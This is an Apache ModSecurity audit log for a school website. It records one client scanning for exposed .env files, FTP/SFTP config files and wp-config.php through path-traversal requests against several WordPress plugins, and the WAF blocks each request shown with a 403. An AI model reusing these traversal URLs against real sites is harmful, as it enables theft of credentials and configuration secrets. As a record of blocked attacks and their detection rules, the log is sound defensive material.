Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af574005-Z-- --4d842e29-A-- [01/May/2025:10:25:34 +0700] aBLprsVMAgMJpNzaVtKqegAAAFI 103.236.140.4 49272 103.236.140.4 8181 --4d842e29-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4d842e29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d842e29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934373450 736 (- - -) Stopwatch2: 1746069934373450 736; combined=288, p1=253, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d842e29-Z-- --b8e07c5a-A-- [01/May/2025:10:25:34 +0700] aBLprigtr0Qsi1mFAsMIXAAAAJI 103.236.140.4 49282 103.236.140.4 8181 --b8e07c5a-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --b8e07c5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8e07c5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934574349 814 (- - -) Stopwatch2: 1746069934574349 814; combined=294, p1=264, p2=0, p3=0, p4=0, p5=30, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8e07c5a-Z-- --a34c0b57-A-- [01/May/2025:10:25:34 +0700] aBLpruVeTgVPHjrSAYAMLwAAABA 103.236.140.4 49292 103.236.140.4 8181 --a34c0b57-B-- GET /ci4/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a34c0b57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a34c0b57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934775034 784 (- - -) Stopwatch2: 1746069934775034 784; combined=308, p1=264, p2=0, p3=0, p4=0, p5=44, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a34c0b57-Z-- --5f906e15-A-- [01/May/2025:10:25:34 +0700] aBLprsVMAgMJpNzaVtKqgAAAAEo 103.236.140.4 49310 103.236.140.4 8181 --5f906e15-B-- GET /backup/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5f906e15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f906e15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069934975310 771 (- - -) Stopwatch2: 1746069934975310 771; combined=290, p1=254, p2=0, p3=0, p4=0, p5=35, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f906e15-Z-- --617a8c6b-A-- [01/May/2025:10:25:35 +0700] aBLpr8VMAgMJpNzaVtKqgwAAAEM 103.236.140.4 49320 103.236.140.4 8181 --617a8c6b-B-- GET /frontend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --617a8c6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --617a8c6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935175856 713 (- - -) Stopwatch2: 1746069935175856 713; combined=223, p1=196, p2=0, p3=0, p4=0, p5=27, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --617a8c6b-Z-- --f5c68120-A-- [01/May/2025:10:25:35 +0700] aBLprygtr0Qsi1mFAsMIXQAAAJQ 103.236.140.4 49330 103.236.140.4 8181 --f5c68120-B-- GET /old/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f5c68120-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5c68120-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935375295 733 (- - -) Stopwatch2: 1746069935375295 733; combined=250, p1=220, p2=0, p3=0, p4=0, p5=30, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5c68120-Z-- --bf9bbd5b-A-- [01/May/2025:10:25:35 +0700] aBLpr4144kZ4LAGlEgzxiQAAAMc 103.236.140.4 49340 103.236.140.4 8181 --bf9bbd5b-B-- GET /dev/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bf9bbd5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf9bbd5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935574884 845 (- - -) Stopwatch2: 1746069935574884 845; combined=280, p1=243, p2=0, p3=0, p4=0, p5=36, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf9bbd5b-Z-- --9c2c2a24-A-- [01/May/2025:10:25:35 +0700] aBLprygtr0Qsi1mFAsMIYAAAAJY 103.236.140.4 49350 103.236.140.4 8181 --9c2c2a24-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9c2c2a24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c2c2a24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935775227 798 (- - -) Stopwatch2: 1746069935775227 798; combined=255, p1=224, p2=0, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c2c2a24-Z-- --8fbb1009-A-- [01/May/2025:10:25:35 +0700] aBLpr4144kZ4LAGlEgzxiwAAAME 103.236.140.4 49364 103.236.140.4 8181 --8fbb1009-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8fbb1009-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fbb1009-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069935975868 856 (- - -) Stopwatch2: 1746069935975868 856; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fbb1009-Z-- --dd6b1973-A-- [01/May/2025:10:25:55 +0700] aBLpw8VMAgMJpNzaVtKqzQAAAEo 103.236.140.4 50248 103.236.140.4 8181 --dd6b1973-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dd6b1973-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd6b1973-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069955269838 820 (- - -) Stopwatch2: 1746069955269838 820; combined=267, p1=240, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd6b1973-Z-- --ab120268-A-- [01/May/2025:10:25:55 +0700] aBLpw8VMAgMJpNzaVtKq0AAAAEI 103.236.140.4 50258 103.236.140.4 8181 --ab120268-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ab120268-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab120268-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069955471495 683 (- - -) Stopwatch2: 1746069955471495 683; combined=259, p1=233, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab120268-Z-- --a3386c49-A-- [01/May/2025:10:25:55 +0700] aBLpw-VeTgVPHjrSAYAMXgAAABU 103.236.140.4 50270 103.236.140.4 8181 --a3386c49-B-- GET /force-download.php?file=wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a3386c49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3386c49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069955671971 722 (- - -) Stopwatch2: 1746069955671971 722; combined=279, p1=235, p2=0, p3=0, p4=0, p5=44, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3386c49-Z-- --9c07097a-A-- [01/May/2025:10:25:55 +0700] aBLpw8VMAgMJpNzaVtKq1AAAAE0 103.236.140.4 50280 103.236.140.4 8181 --9c07097a-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9c07097a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c07097a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069955871897 805 (- - -) Stopwatch2: 1746069955871897 805; combined=293, p1=258, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c07097a-Z-- --d578dd06-A-- [01/May/2025:10:25:56 +0700] aBLpxOVeTgVPHjrSAYAMYAAAABg 103.236.140.4 50294 103.236.140.4 8181 --d578dd06-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --d578dd06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d578dd06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069956072399 922 (- - -) Stopwatch2: 1746069956072399 922; combined=346, p1=305, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d578dd06-Z-- --0ac11605-A-- [01/May/2025:10:26:02 +0700] aBLpyo144kZ4LAGlEgzx6wAAAMw 103.236.140.4 50602 103.236.140.4 8181 --0ac11605-B-- GET /.vscode/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --0ac11605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ac11605-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069962704228 804 (- - -) Stopwatch2: 1746069962704228 804; combined=333, p1=299, p2=0, p3=0, p4=0, p5=34, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ac11605-Z-- --bf6fc11a-A-- [01/May/2025:10:26:02 +0700] aBLpysVMAgMJpNzaVtKq6AAAAFY 103.236.140.4 50612 103.236.140.4 8181 --bf6fc11a-B-- GET /resources/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bf6fc11a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf6fc11a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069962905007 934 (- - -) Stopwatch2: 1746069962905007 934; combined=369, p1=321, p2=0, p3=0, p4=0, p5=47, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf6fc11a-Z-- --8fcb7170-A-- [01/May/2025:10:26:03 +0700] aBLpy-VeTgVPHjrSAYAMbQAAAAg 103.236.140.4 50656 103.236.140.4 8181 --8fcb7170-B-- GET /ftp.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8fcb7170-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fcb7170-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746069963827752 2339 (- - -) Stopwatch2: 1746069963827752 2339; combined=959, p1=411, p2=519, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
